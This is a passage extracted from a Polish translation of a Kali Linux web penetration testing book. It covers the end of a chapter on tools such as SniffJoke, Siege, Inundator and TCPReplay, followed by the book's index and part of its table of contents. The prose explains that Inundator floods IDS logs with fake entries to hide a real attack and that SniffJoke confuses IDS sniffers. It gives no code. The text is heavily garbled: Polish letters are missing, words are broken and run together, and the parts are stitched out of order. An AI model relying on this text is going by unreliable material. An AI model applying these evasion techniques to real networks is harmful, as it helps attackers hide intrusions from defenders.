SniffJoke pozwala na zupe nie przezroczyste przechwytywanie po cze TCP wprowadzaniedo nich opoacute nie modyfikowanie zawarto ci pakietoacutew oraz wstrzykiwanie fa szywych spre-parowanych pakietoacutew do sesji TCP u ytkownika Powoduje to e pasywne rozwi zania mo-nitoruj ce i zabezpieczaj ce ruch sieciowy takie jak systemy IDSIPS i sniffery maj du eproblemy z poprawn interpretacj po cze sieciowych Dzia anie programu wywo uje roacute -nice mi dzy ruchem sieciowym ktoacutery jest przechwytywany i przewidywany przez sniffera rzeczywistym ruchem sieciowym generowanym przez klienta w rezultacie czego algorytmybuduj ce bdquokonwersacjerdquo sieciowe dla sniffera maj problemy z poprawnym sk adaniem kolej-no ci pakietoacutew Na kolejnych dwoacutech rysunkach przedstawiamy proces przechwytywania ru-chu sieciowego mi dzy dwoma u ytkownikami bez udzia u pakietu SniffJoke oraz w sytuacjikiedy pakiet SniffJoke dzia a

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

268

SiegeSiege to narz dzie przeznaczone do testowania odporno ci na przeci enia po czeHTTPHTTPS pozwalaj ce deweloperom aplikacji internetowych na sprawdzanie zachowa-nia kodu aplikacji w skrajnych warunkach pracy Program Siege pozwala na wielow tkowegenerowanie sesji HTTP i analizowanie zachowania serweroacutew pod symulowanym obci eniemwielu u ytkownikoacutew Siege mo e pracowa w trybie regresji symulacji internetu oraz w trybiebrute-force

Aby uruchomi program Siege w systemie Kali Linux przejd do grupy Kali Linux i nast p-nie wykonaj polecenie Stress TestingNetwork Stress Testingsiege (zobacz pierwszy rysunekna nast pnej stronie)

Sk adnia wywo ania polecenia siege jest nast puj ca

siege [opcje] ltadres URL celugt

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

269

Rysunek przedstawiony poni ej przedstawia program Siege testuj cy witryn httpwwwthesecuritybloggercom Program domy lnie symuluje obci enie po czeniami od 15 u ytkow-

nikoacutew co zosta o przedstawione na rysunku poni ej Kiedy zatrzymasz dzia anie programuSiege generuje raport ktoacutery zosta zamieszczony na kolejnym rysunku

InundatorInundator to narz dzie pozwalaj ce na omijanie i neutralizowanie dzia ania systemoacutew IDS (angIntrusion Detection System) oraz IPS (ang Intrusion Protection System) poprzez bdquozalewanierdquo gene-rowanych przez nie dziennikoacutew spreparowanymi wpisami Koncepcja kryj ca si za takim rozwi -zaniem polega na tym e poprzez bdquozasypywanierdquo dziennikoacutew tysi cami fa szywie pozytywnych

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

270

wpisoacutew mo na ukry rzeczywisty atak ktoacutery staje si przez to potencjalnie bdquoniewidzialnyrdquo i ktoacutere-go poacute niejsza analiza ledcza jest mocno utrudniona Pakiet Inundator mo e by roacutewnie wy-korzystywany do testowania efektywno ci modu oacutew generuj cych alarmy w systemach SIEMczy IDSIPS

TCPReplayProgram TCPReplay wykorzystuje uprzednio przechwycony i zapisany w plikach w formacielibpcap ruch sieciowy do testowania dzia ania roacute nych urz dze sieciowych TCPReplay po-trafi rozpoznawa ruch generowany przez klienty i serwery modyfikowa nag oacutewki pakietoacutew2 3 i 4 warstwy oraz wstrzykiwa pakiety do sieci co pozwala na testowanie takich urz dze jakprze czniki routery zapory sieciowe czy systemy IDSIPS TCPReplay obs uguje roacute ne try-by pracy interfejsoacutew sieciowych

Moacutewi c w skroacutecie pakiet TCPReplay pozwala na przechwytywanie i zapisywanie ruchu sie-ciowego przesy anego mi dzy klientem a serwerem i nast pnie na retransmisj tego ruchu w do-wolnym czasie i miejscu w sieci

PodsumowanieOmawiane w tym rozdziale zagadnienia i oprogramowanie stanowi y dope nienie arsena utechnik i narz dzi ka dego pentestera aplikacji internetowych Po zako czeniu lektury powinieneju wiedzie jak zdobywa informacje o celach jak wyszukiwa podatno ci i luki w zabezpie-czeniach jak analizowa interakcje pomi dzy klientami a serwerami jak wykorzystywaexploity oraz luki w zabezpieczeniach oraz jak w razie potrzeby zak oacuteca dzia anie us ug interne-towych W tym i poprzednich rozdzia ach dokonali my kroacutetkiego przegl du narz dzi dost p-nych zaroacutewno w systemie Kali Linux jak i w internecie ktoacutere powinny si znale w arsenaleka dego specjalisty zajmuj cego si przeprowadzaniem testoacutew penetracyjnych Kali Linuxudost pnia wiele warto ciowych narz dzi aczkolwiek ka dy dobry pentester u ywa te w asnychskryptoacutew i programoacutew wykorzystuj cych luki typu Zero-Day Je eli chcesz by dobrym penteste-rem powiniene ustawicznie testowa nowe metody atakoacutew sprawdza roacute ne narz dzia penetra-cyjne i samodzielnie poszerza swoj wiedz na temat zagadnie omawianych w naszej ksi ce

W tym rozdziale omawiali my techniki b d ce niejako uwie czeniem ca ego procesu atako-wania aplikacji internetowych podczas przeprowadzania testoacutew penetracyjnych Poruszanetutaj by y zagadnienia zwi zane z prze amywaniem zabezpiecze aplikacji internetowychprzy u yciu atakoacutew na przegl darki atakoacutew z wykorzystaniem serweroacutew proxy oraz przechwyty-wania hase dost pu Rozdzia zako czyli my zagadnieniami zwi zanymi z zak oacutecaniem i przery-waniem dzia ania us ug sieciowych przy u yciu atakoacutew DoS oraz testowaniem odporno ciaplikacji i us ug sieciowych na prac w skrajnych warunkach obci enia

W nast pnym rozdziale zmienimy zupe nie front i wyja nimy jak przy u yciu narz dzi dost p-nych w systemie Kali Linux chroni aplikacje internetowe przed atakami pentesteroacutew i hakeroacutew

Kup książkę Poleć książkę

Skorowidz

Aacccheck 228Active Directory 171 194ADC 286 287adres URL definiowanie 254adresy IP sfa szowane 285aktualizacje 275

harmonogram 276zabezpiecze systemu 276

ALE 31analiza

bitowych obrazoacutew dyskoacutew 295list wyrazoacutew 189pakietoacutew sieciowych 206plikoacutew binarnych

zawieraj cychoprogramowanie firmware298

ruchu sieciowego 212s ownikoacutew 189sygnatur plikoacutew 299systemu plikoacutew 291 298zawarto ci plikoacutew indexdat

299zawarto ci plikoacutew PDF 299

da HTTP 203aplet Java 156aplikacje internetowe 23

b dy w zabezpieczeniach286

wykrywanie i mapowanie 241zakres testoacutew penetracyjnych

23Application Layer Attacks 257apt-get install httrack 66architektura klient-serwer 91ARO 31ARP 212

ARP address flooding 142ARP Spoofing 141arpspoof 141 212ataki

brute-force 125 170DDoS 256DoS 255hybrydowe 170LFI 254man-in-the-middle 139 211metod si ow 125na aplikacje internetowe 231na bazy danych 219 222na cele w internecie 250na klienty aplikacji

internetowych 147na parametry metod GET

i POST 131na protoko y komunikacyjne

256na serwery aplikacji

internetowych 92na serwery DNS 71na serwery WWW 231na warstw aplikacji 257na zarz dzanie sesjami 195na dania Form 131na dania HTTP 134powoduj ce wyczerpanie

zasoboacutew sesji 257przechwytywanie sesji 197RFI 254s ownikowe 169 228socjotechniczne 148 151

amanie hase 169SSL stripping 140SSL-Exhaustion 257THC-SSL-DOS 257

wykorzystuj ce przeci eniepo cze sieciowych 256

XSS 223 248z klonowaniem 151z u yciem narz dzi

penetracyjnych opartychna przegl darkach 236

audytbezpiecze stwa 21 28serweroacutew WWW 92sesji WWW 199 203warto 301

Authentication hijacking 225Autopsy 295AV 31

BBackTrack 38badanie zasoboacutew sieci

komputerowych 65bazy danych 218BeEF 232

panel zarz dzania pakietu 234przechwycony system 235

bezpiecze stwo sesji HTTP 281bezpiecze stwo systemu 272

a testy penetracyjne 32czynnik ludzki 148instalowanie oprogramowania

i urz dze 274podstawowe wymogi 273

bia e pude ko 24Binwalk 298bitowe kopie no nikoacutew danych

288 291narz dzia 293partycje 292suma kontrolna 294

Kup książkę Poleć książkę

Skorowidz

330

black-box 24 30BootKey 171 173Browser Exploitation

Framework 232brute-force 125 170

amanie hase 171bulk_extractor 300BURP 236BURP Proxy 238

Intercept 241opcje konfiguracyjne 239

Burp Spider 241 244Burp Suite 238

Ccs 139CAC 194Cain and Abel 173Center for Internet Security 275certyfikaty

CEH 311CISSP 31 193g oacutewnego urz du certyfikacji

106GPEN 311raport ko cowy 310SSL 106 282z podpisem w asnym 282

chkrootkit 295chntpw 180

uruchomienie w Kali Linux182

ciasteczka 197edytowanie zawarto ci 199

201niezabezpieczone 208obrona przed

przechwytywaniem 286przegl danie 201uwierzytelniaj ce ofiary 198wstrzykiwanie 198wykradanie 198 208 225zarz dzanie 200

ci g zaburzaj cy 170Cisco Network Foundation

Protection 275CISSP 193Clickjacking 196

kod roacuted owy stron 197obrona przed atakiem 287

CmosPwd 190

Cookie Cadger 203dane o sesji 204

Cookie Injector 200cookie injector tool 198cookies 197Cookies Manager+ 198 201COTS 231cracks per second 139Crackstation 278creddump 191cross-site scripting 223Crunch 169 185

znaki specjalne 186CutyCapt 327czarne pude ko 24

DDBPwAudit 229dc3dd 293 297dd 291DDoS 256

kategorie atakoacutew 256obrona przed atakiem 285

Debian 38Denial of Service 256dictstat 189Dig 71DirBuster 128

raport 130Distributed Denial of Service

256DNS 267DNSChef 266dokumentacja 306DoS 256

kategorie atakoacutew 256obrona przed atakiem 285

dost p do systemualternatywny 37techniki XSS 225

dost pno 30Dradis 325Driftnet 217dsniff 212

nas uchiwaniei przechwytywaniepakietoacutew 213

uruchamianie 214dual-boot configuration 44

EEDGAR 57EF 31ekspertyza ledcza 289e-mail relay server 124encrypted passwords 137Equifax Secure Certificate

Authority 282Ettercap 214

lista celoacutew 216skanowanie sieci 216

Exploitation Tools 36 37 48exploity 92 113

Reserve_TCP Meterpreter156

Ffa szywe

adresy IP 285odpowiedzi DNS 267witryny 159 252

Ferret 209uruchamianie 210

FHS 38Fierce 73Fimap 254findmyhash 190fingerprinting 93Firefox wtyczki 198 236Firesheep 199FOCA 84

utworzenie nowego projektu84

Foremost 299Forensics 48 290FoxyProxy 236fping 70funkcja skroacutetu 170

kopie no nikoacutew danych 288fuzzing aplikacji internetowych 93

Ggenerator

hase 278adunkoacutew 132

GHDB 63GIT 250glosariusz 319

Kup książkę Poleć książkę

Skorowidz

331

Google hacking 61Google Hacking Database 63Google Internet Authority 282GPU 177Greasemonkey 200grey-box 25 30gromadzenie danych 34GRUB 44Gruyere 224 246

instancja projektu 225

HHackBar 219Hak5 Pineapple 211Hamster 208Hardware Hacking 48hashcat 177hashed passwords 137Hash-identifier 188has a 137

dost pu 250generowanie listy 185amanie 169

ochrona 170polityka zarz dzania 277przechowywanie 278przechwytywanie 157 169

249si a 277w systemie Linux 173w systemie Windows 171

haszowanie 170z dodatkiem soli

kryptograficznej 170hexinject 228hiper cza spreparowane 196home feed option 163hosty skanowanie 162HTTrack 66 279Hydra 125

uruchomienie 128

IICMP Echo Request 70identyfikacja

adresoacutew URL 227celoacutew za pomoc serweroacutew

DNS 73obszaroacutew krytycznych 27typoacutew haszowanych warto ci

188

iFrame 196Information Gathering 34 46informatyka ledcza 287

zasady 288integralno 30intercept proxy 105interfejs p tli zwrotnej 239Inundator 269in ynieria

spo eczna 148wsteczna 48

ionCube Loader 64IP Forwarding 141IPSIDS 231iptables 142

Jj zyk SQL 218John the Ripper 137 173

domy lna konfiguracjacie ek 176

haszowanie 170amanie hase 174

proces 137amanie pliku hase 139

s owniki 138 177szybko dzia ania 138

Johnny 138amanie hase 174

opcje konfiguracyjneprogramu 175

s owniki 177uruchamianie 175

KKali Linux 15

aktualizacja pakietu SET 150instalowanie 40

pakietoacutew 43konfiguracja 39Live CD 180 290minimalne wymagania

sprz towe 40narz dzia dost pne

w systemie 46Network Install 40proces konfigurowania

partycji dysku 42publiczny adres IP 225s owniki 129

uruchamianiew maszynie wirtualnej 46w trybie Forensics 290z no nika zewn trznego 39

wprowadzenie do systemu 38karty dost pu 194KeepNote 326klienty 91 147

aplikacji internetowych 169191

HTTP 262klonowanie

rodowiska 278witryny internetowej 66 153

158 251 279klucze uruchamiania systemu

171 173komunikaty

ICMP 70o up ywie czasu dania 70

kopiowanie plikoacutew SAMi SYSTEM z hosta 172

LLinux amanie hase 173lista

adresoacutew URL 227potencjalnych hase 185

listener port 142Live HTTP Headers 134Local File Inclusion 254Logical Volume Manager 43LOIC 263

tryby 266luki w zabezpieczeniach

aktualizacja bazy 276aplikacji internetowych 245

254hostoacutew 167przegl darek 232raport ko cowy 315systemoacutew poczty

elektronicznej 123usuwanie 276wstrzykiwanie kodu SQL 221wstrzykiwanie skryptoacutew 223wykorzystywanie 113wyszukiwanie 92

LVM 43

Kup książkę Poleć książkę

Skorowidz

332

adunek 117amanie hase 137 169

bezp atne us ugi sieciowe190

haszowanych 189maska 189narz dzia 174przechowywanych w plikach

systemowych 169si owe 229systemu Linux 173techniki 169za pomoc John the Ripper

174zabezpieczaj cych BIOS

komputera 190cza modyfikacja 196

MMAC 172MagicTree 327Maintaining Access 38 48Maltego 58 74

zadania 76Maltego CaseFile 326man-in-the-middle 139 211

obrona przed atakiem 281przeprowadzanie manualne

212maska 189mechanizmy

HSTS 140klonowania 153obronne 231 271

testowanie 273pasywnego nas uchiwania 208renegocjacji bezpiecznego

po czenia SSL 257usuwania mi kkich b doacutew

404 93mened er LVM 43metadane 83

wyszukiwanie i analiza 83Metasploit 113 154

skanowanie sieci lokalnej 114wersja konsolowa 114

meterpreter 151uruchomienie sesji 156wykorzystanie 156

metodologiacertyfikacji CISSP 193testoacutew penetracyjnych 24

310 323metody

pojedynczegouwierzytelniania 194

szyfrowania 283mirror server 43MitM Proxy 161montowanie dyskoacutew z systemem

Windows 172

Nnag oacutewki X-Frame-Options 287narz dzia

do klonowania witryn 281do amania hase 174do przechwytywania sesji

198do przeprowadzania atakoacutew

DoSDDoS 285ledcze 295

wspomagaj ce tworzenieraportoacutew 325

nas uchiwaniepakietoacutew sieciowych 199ruchu sieciowego 143 228

nazwy DNS 71Nessus 162

HomeFeed 163instalowanie w systemie

Kali Linux 163ProfessionalFeed 163raporty 167 168skanowanie hostoacutew 166uruchomienie 164u ywanie 164

Netcat 124NetFlow 286NGIPS 236Niskoorbitalne Dzia o Jonowe

263Nmap 76

agresywne skanowanie 79graficzny interfejs

u ytkownika 77okno wynikoacutew skanowania 82opcje 79

NoScript 287no niki danych 288

Oobrona przed atakami

Clickjacking 287DoS 285man-in-the-middle 281przechwytywanie ciasteczek

286SSLstrip 284

ocena ryzyka 30formu y 31okna serwisowe 277

ocl 178oclHashcat 177odgadywanie hase 169okna serwisowe 277Ophcrack 183

uruchomienie w Kali Linux184

osobista weryfikacja to samo ci194

oszacowanie bezpiecze stwa 21o wiadczenie o zachowaniu

poufno ci 307otwarta implementacja sterownikoacutew

kart graficznych 178Owasp-Zap 105 245

automatyczne logowanie 110konfigurowanie przegl darki

108mechanizm aktualizacji ca ego

pakietu 110proces uwierzytelniania 109przeprowadzanie atakoacutew 109raporty 111

PPAE 39pakiety

ARP 212czas ycia 259MitM Proxy 161SET 149 249sieciowe 259TCP 259

pami masowa urz dze 289partycje 172

wymiany 291Pasco 299Password Attacks 37 47 174Patator 229

Kup książkę Poleć książkę

Skorowidz

333

pdf-parser 299pentesterzy 15phishing email 159phrasendrescher 190PIV 194pliki

binarne 298CLF 227indexdat 299Robotstxt 53SAM 171 178 180

wydobycie zawarto ci 173SEED 247shadow 173strefowe 71wyszukiwanie i odzyskiwanie

299poczta elektroniczna 123

fa szywe wiadomo ci 159podatno na atak 29

aktualizacja bazy 276aplikacji internetowych 245

254ocena ryzyka 30przegl darki 232raport ko cowy 315skanowanie 30usuwanie 276wyszukiwanie 92XSS 223 226

podnoszenie uprawnie 37podstawowe wymogi

bezpiecze stwa 303podsumowanie ustale 313polecenia

apt-get install 233apt-get update 233arpspoof 142binwalk 298bkhive 173bkhive SYSTEM bootkey 180bkreg 173chntpw -i 183chntpw -l SAM 181cp 139Data 124db_nmap 115dc3dd 293expand 171exploit 119fdisk 172fierce 123fping 70

getsystem 222git 150HELO 124host 114ifconfig 140ifdown 140iptables 141 142john -test 138MAIL FROM 124md5sum 297msfcli 113msfconsole 113msfgui 113netcat 124ping 70protoko u SMTP 124RCPT TO 124route -n 141samdump 173samdump SAM bootkey 180services 114 115sessions -I 1 157set payload 117sfdisk -l 291sha256sum 294show options 117 118show payloads 117sqlmap 222SYSKEY 173traceroute 69use 116

polityka zarz dzania has ami 277po czenia

HTTP 268HTTPS 268

po czeniaTCP 267troacutejetapowe 79VPN 282

poprawki zabezpiecze 275harmonogram instalowania 276proces zarz dzania 276

porty443 1198080 108 245komunikacyjne 118nas uchuj ce 142

poufno 30poziom zabezpiecze

minimalny 274podstawowy 274

PREROUTING 143

Privilege Escalation 37produkty z poacute ki 231professional feed option 163projekty

Emily 59Gruyere 224 246

promiscuous mode 47Protocol Attacks 256protoko y

8021x 283HTTPS 282MACsec 283routingu 285SSL 257SSLTLS 30 281 286TLS 281

ProxyStrike 98robot sieciowy 100

przechwytywanieciasteczek 197 209 286danych logowania

u ytkownikoacutew 211hase 169 249nazw kont i hase 157obrazoacutew przesy anych

w sieci 217pakietoacutew 213

sieciowych 210TCP 259

przechwytywaniepo cze 161

TCP 267ruchu HTTP oraz HTTPS 238ruchu sieciowego 207 267

270sesji 197 208 233

narz dzia 198przegl d projektu 306przegl darki 232

ochrona przed atakami 236zabezpieczenia 249

przekazywanie pakietoacutew IP 142212

przekierowaniepo cze 284portoacutew komunikacyjnych

142ruchu sieciowego 141sesji 284

przestrze celoacutew 27przetwarzanie wielow tkowe 262PwDump 173

Kup książkę Poleć książkę

Skorowidz

334

RRainbow Tables 47 170RainbowCrack 170 189ramy czasowe 308raport ko cowy

b dy 302dodatki 319dokumentacja 306format 307glosariusz 319informacje o metodologii 310konsekwencje 302narz dzia wspomagaj ce

tworzenie 325o wiadczenie o zachowaniu

poufno ci 307podatno ci i luki

w zabezpieczeniach 315podsumowanie ustale 313

zestawienie elementoacutew 315prezentacja 302przegl d projektu 306ramy czasowe projektu 308specyfikacja 28streszczenie 309strona tytu owa 307szczegoacute owe procedury

testowania 312tworzenie 301us ugi profesjonalne 304wersja ko cowa 306wersja robocza 306wnioski i rekomendacje

dla rodowiska sieciowego316

wymagania 303wype nianie szablonu 306zakres projektu 306zarz dzanie wersjami

dokumentacji 308zgodno ze standardami

i procedurami 303rcracki_mt 189Regional Internet Registries 57rekomendacje 316

powykonawcze 28rekonesans 34 51

badanie zasoboacutew siecikomputerowych 65

Google hacking 61

Google Hacking Database 63lokalizacja 60oferty pracy 59plik Robotstxt 53regionalni administratorzy

adresoacutew IP 57rozpoznanie wst pne 53sieciowy 65strona internetowa firmy 53system EDGAR 57wyszukiwarka Shodan 60z wykorzystaniem protoko u

ICMP 69z wykorzystaniem serweroacutew

DNS 71zadania 52zasoby serwisoacutew

spo eczno ciowych 58zaufanie 59roacuted a przechowuj cehistoryczne wersje witryninternetowych 54

rekordy zasobowe 71Remote File Inclusion 254renegocjacja sesji SSL 258Reporting Tools 48Reverse Engineering 48rich-text 326robot sieciowy 93 100 241roczna oczekiwana strata 31roczny wska nik wyst pienia

zdarzenia 31rootkit 295rozsy anie spreparowanych

pakietoacutew ARP 141rozszerzenia PAE 39ruch sieciowy 206

adresy URL 227man-in-the-middle 212monitorowanie 227nas uchiwanie 143 228przechwytywanie 267 270przekierowanie 213sprawdzanie ilo ci 263urz dzenia monitoruj ce 285

SSAM 171samdump2 178Scalpel 299

Scapy 257 259scenariusze atakoacutew 260

security assessment 21security audit 21serwery 91

aplikacji internetowych 92223zabezpieczanie 136 249

atakowanie 262limit roacutewnoleg ych sesji 262poczty elektronicznej 123proxy 98 105 236

wykorzystanie 238Samba 116sieciowe 91WWW 262

serwery DNSidentyfikacja celoacutew 73proxy 267rekonesans 71

serwisy spo eczno ciowe 58sesja 195

ciasteczka 197logowania 205mechanizmy bezpiecze stwa

195Session Exhaustion 257session fixation attack 195session hijacking 197SET 149 249

adres IP sklonowanej witryny158

aplet Java 156Credential Harvester Attacks

157Exploit to deliver 154importowanie w asnych

plikoacutew witrynyinternetowej 158

IP addresshostname forreverse connection 154

mechanizmy chroni ceprzeprowadzany atak 155

NATPort forwarding 154przechwycenie nazw kont

i hase 157raport o zdarzeniu 160raporty 253rozsy anie fa szywych

wiadomo ci 159URL you want to clone 154

Kup książkę Poleć książkę

Skorowidz

335

uruchomienie 151utworzenie kopii witryny 153zastosowanie do ataku

z klonowaniem 151SharePoint 151Shodan 60Sidejacking 208Siege 268skanery

biometryczne 194stron internetowych 246

skanowanieadresoacutew URL 93agresywne 79celoacutew 35hostoacutew 162podatno ci na ataki 30 32portoacutew 93witryny 255z wykorzystaniem protoko u

ICMP 70Skipfish 95

raport 97s owniki 96

skryptyopakowuj ce 228wykrywanie

nieautoryzowanychskryptoacutew 287

XSS 224 226SLE 31Slowloris 261s owa kluczowe

dbs 222FUZZ 133 135tables 222

sniffer 267Sniffing and Spoofing 48SniffJoke 267Social Engineer Toolkit 149social engineering 16 148SOW 319spodziewana jednorazowa strata

31sqlmap 221SSL stripping 140SSLstrip 140 197 211

konfigurowanieprzekierowania portoacutew 142

mechanizm dzia ania 284obrona przed atakiem 284rozpocz cie ataku 141

SSO 194

standardy 28 304status testu 24 27STIG 274strategia ataku 36Stress Testing 48strony WWW 241suma kontrolna 293

baza 298sygnatury plikoacutew 299SYSKEY 171System services 48systemy

BeEF 59EDGAR 57IDS 93 269IPS 269NGIPS 236roacutewnowa enia obci enia

i filtrowania zawarto ci 286SCADA 60SIEM 270z kartami dost pu 194zabezpiecze 231

szablony witryn 251szare pude ko 24szyfrowane po czenia

https 197VPN 282

Ttablice t czowe 170 189

amanie hase systemuWindows 183

Tamper Data 125TCPReplay 270Tenable 163testowanie

dzia ania roacute nych urz dzesieciowych 270

mechanizmoacutew obronnych 273odporno ci na przeci enia

268podatno ci na ataki XSS 224sklonowanego rodowiska

279testy

o nieograniczonym zakresiedzia ania 26

odporno ci na przeci eniesystemu 256

warunkoacutew skrajnych 256

testy penetracyjne 21a skanowanie podatno ci 32aplikacji internetowych 23bezpiecze stwo zasoboacutew 32cele 22 255etapy 24 34okre lenie poziomu

zabezpiecze 307pomy lno 33przeprowadzanie 32 33socjotechniczne 149w asnego rodowiska 272 273z wykorzystaniem systemu

Kali Linux 34zakres prac 25 26zewn trzne 321zgoda w a ciciela 33

THX-SSL-DOS 257tokeny 194

sesji 197transfery stref 71 73triada CIA 30tryb nas uchiwania 207 215ttl 259

Uumowy

oczekiwania klienta 317potencjalne problemy

i zagadnienia 324rozliczane wed ug zu ycia

czasu i zasoboacutew 305wykaz prac 319ze sta cen 304

unattended installation 39Unicast RPF 285urlsnarf 227usermap_script 116us ugi

NAT 251profesjonalne 304w chmurze 211

usuwanie ladoacutew w amania 38utrzymanie zdobytego

przyczoacute ka 37uwierzytelnianie 193

ataki s ownikowe 228dodatkowe rozwi zania 194dwusk adnikowe 283pojedyncze 194u ytkownikoacutew 193wielosk adnikowe 193

Kup książkę Poleć książkę

Skorowidz

336

VVega 101

modu serwera proxy 104zestawienie znalezionych

podatno ci 104Volume Based Attacks 256Vulnerability Analysis 35 46vulnerability assessment 32

Ww3af 120

wykorzystanie znalezionychpodatno ci i lukw zabezpieczeniach 122

w3mir 281warto

ryzyka 32sumy kontrolnej 293zasobu 31

WayBack Machine 54Web Applications 47Web Developer 199WebCopier 281Webshag 92

obs uga programu 93raport 95

WebSlayer 131atak na dania HTTP 134generator adunkoacutew 132

Websploit 112weryfikacja po cze HTTPS 281white-box 25 30Windows 171

ataki typu offline 171lista kont u ytkownikoacutew 181montowanie dyskoacutew 172odczytywanie i zapisywanie

plikoacutew 172partycja systemu 172uzyskanie dost pu do

systemu 180Windows Reverse_TCP

Meterpreter 154Wireless Attacks 47Wireshark 206

filtrowanie 208wirtualne rodowisko testowe 279wska nik ekspozycji 31wstrzykiwanie

ciasteczek 198kodu 248

kodu SQL 218pakietoacutew 228skryptoacutew 223

wtyczki przegl darki Firefox 198wykaz prac

dodatkowe elementy 323dodatkowe uzgodnienia

prawne 323koszty us ug 323lista narz dzi 324metodologia testoacutew 323oczekiwania

i odpowiedzialno 323szczegoacute owy 319uwierzytelnianie 324zewn trzne testy

penetracyjne 321wykorzystywanie

b doacutew w zabezpieczeniachprzegl darki 196

exploitoacutew 92luk w zabezpieczeniach 113

254systemoacutew poczty

elektronicznej 123zidentyfikowanych

podatno ci 36 254wymogi bezpiecze stwa 273wyszukiwanie

luk w zabezpieczeniach 92 221metadanych 83podatno ci 29 35 92

wytyczne 28 304

XXSS 223

aplikacje internetowe 248testowanie podatno ci 224

XSS cookie stealing 225

Zzabezpieczanie

serweroacutew aplikacjiinternetowych 249

systemoacutew pod czonychdo internetu 271

zakres prac 319cel testu 33definicja

przestrzeni celoacutew 27systemoacutew 26

zdobycia flagi 28dokument 25identyfikacja obszaroacutew

krytycznych 27materia y i raporty 33metody testowania 26narz dzia 27oprogramowanie 27osoby powiadomione o

planowanym te cie 27pocz tkowy status testu 27ramy czasowe testu 26 308reakcja na proacuteby

prze amywaniazabezpiecze 27

rekomendacjepowykonawcze 28

specyfikacja raportuko cowego 28

ZAP 236 245obrona przed zdalnymi

atakami 249Zaproxy 105zarz dzanie

aktualizacjami 275poprawkami zabezpiecze

275serwerem pakietu 233sesjami 195wersjami dokumentoacutew 308

zasoby sieciowe odpornona przeci enie 263

zatarcie ladoacutew penetracji systemu38

zaufanie 59 148zbieranie odciskoacutew systemu 51zdobycie flagi 28Zenmap 77 82 125

Host details 81Zero-day 275zewn trzny dysk USB 292zmienne

LHOST 118RHOST 117

znaczniki czasu 172zrzut okna 327

daniaForm 131mapowanie 24

Kup książkę Poleć książkę

Page 3: Tytuł oryginału: Web Penetration Testing with Kali Linuxpdf.helion.pl/kalili/kalili.pdf · Uruchamianie systemu Kali Linux z no nika zewnÚtrznego 39 Instalowanie systemu Kali Linux

Spis tre ci

4

Rozdzia 2 Rekonesans 51

Zadania rekonesansu 52Rozpoznanie wst pne 53

Strona internetowa firmy 53roacuted a przechowuj ce historyczne wersje witryn internetowych 54

Regional Internet Registries czyli regionalni administratorzy adresoacutew IP 57System EDGAR 57Zasoby serwisoacutew spo eczno ciowych 58Zaufanie 59Oferty pracy 59Lokalizacja 60Wyszukiwarka Shodan 60Google hacking 61GHDB czyli Google Hacking Database 63Badanie zasoboacutew sieci komputerowych 65Rekonesans z wykorzystaniem protoko u ICMP 69Rekonesans z wykorzystaniem serweroacutew DNS 71Nmap 76FOCA mdash wyszukiwanie i analiza metadanych 83

Podsumowanie 89

Rozdzia 3 Ataki na serwery aplikacji internetowych 91

Wyszukiwanie podatno ci i luk w zabezpieczeniach 92Webshag 92Skipfish 95ProxyStrike 98Vega 101Owasp-Zap 105Websploit 112

Wykorzystywanie znalezionych luk w zabezpieczeniach (exploity) 113Metasploit 113w3af 120

Wykorzystywanie luk w zabezpieczeniach systemoacutew poczty elektronicznej 123Ataki typu brute-force 125

Hydra 125DirBuster 128WebSlayer 131

amanie hase 137John the Ripper 137

Ataki typu man-in-the-middle 139SSLStrip 140

Podsumowanie 145

Kup książkę Poleć książkę

Spis tre ci

5

Rozdzia 4 Ataki na klienty aplikacji internetowych 147

In ynieria spo eczna 148Pakiet SET mdash Social Engineer Toolkit 149

Zastosowanie pakietu SET do ataku z klonowaniem 151MitM Proxy 161Skanowanie hostoacutew 162

Skanowanie hostoacutew za pomoc pakietu Nessus 162Przechwytywanie i amanie hase u ytkownikoacutew 169

Has a w systemie Windows 171Has a w systemie Linux 173

Narz dzia do amania hase dost pne w systemie Kali Linux 174Johnny 174Programy hashcat i oclHashcat 177samdump2 178chntpw 180Ophcrack 183Crunch 185

Inne narz dzia dost pne w systemie Kali Linux 188Hash-identifier 188dictstat 189RainbowCrack (rcracki_mt) 189findmyhash 190phrasendrescher 190CmosPwd 190creddump 191

Podsumowanie 191

Rozdzia 5 Ataki na metody uwierzytelniania 193

Ataki na zarz dzanie sesjami 195Clickjacking 196

Przechwytywanie ciasteczek sesji 197Narz dzia do przechwytywania sesji 198

Wtyczki przegl darki Firefox 198Cookie Cadger 203Wireshark 206Pakiety Hamster i Ferret 208Atak typu man-in-the-middle 211Narz dzia dsniff i arpspoof 212Ettercap 214Driftnet 217

Wstrzykiwanie kodu SQL 218sqlmap 221

Ataki typu XSS (cross-site scripting) 223Testowanie podatno ci na ataki XSS 224

Techniki XSS cookie stealing i Authentication hijacking 225

Kup książkę Poleć książkę

Spis tre ci

6

Inne narz dzia 227urlsnarf 227acccheck 228hexinject 228Patator 229DBPwAudit 229

Podsumowanie 229

Rozdzia 6 Ataki na aplikacje internetowe i serwery WWW 231

BeEF mdash Browser Exploitation Framework 232FoxyProxy mdash wtyczka przegl darki Firefox 236BURP Proxy 238OWASP-ZAP 245Przechwytywanie hase mdash pakiet SET 249Fimap 254Ataki typu DoS 255

THX-SSL-DOS 257Scapy 259Slowloris 261

LOIC czyli Niskoorbitalne Dzia o Jonowehellip 263Inne narz dzia 266

DNSChef 266SniffJoke 267Siege 268Inundator 269TCPReplay 270

Podsumowanie 270

Rozdzia 7 Przeciwdzia anie i zapobieganie 271

Testowanie mechanizmoacutew obronnych 273Podstawowe wymogi bezpiecze stwa 273STIG 274Zarz dzanie aktualizacjami i poprawkami zabezpiecze 275Polityka zarz dzania has ami 277

Klonowanie rodowiska 278HTTrack 279Inne narz dzia do klonowania witryn 281

Obrona przed atakami typu man-in-the-middle 281Obrona przed atakami SSLstrip 284

Obrona przed atakami typu DoS 285Obrona przed przechwytywaniem ciasteczek 286Obrona przed atakami typu Clickjacking 287Informatyka ledcza 287

Uruchamianie systemu Kali Linux w trybie Forensics 290Analiza systemu plikoacutew za pomoc narz dzi systemu Kali Linux 291Inne narz dzia ledcze w systemie Kali Linux 295

Podsumowanie 300

Kup książkę Poleć książkę

Spis tre ci

7

Rozdzia 8 Tworzenie raportoacutew ko cowych 301

Zgodno ze standardami i procedurami 303Us ugi profesjonalne 304Dokumentacja 306Format raportu 307

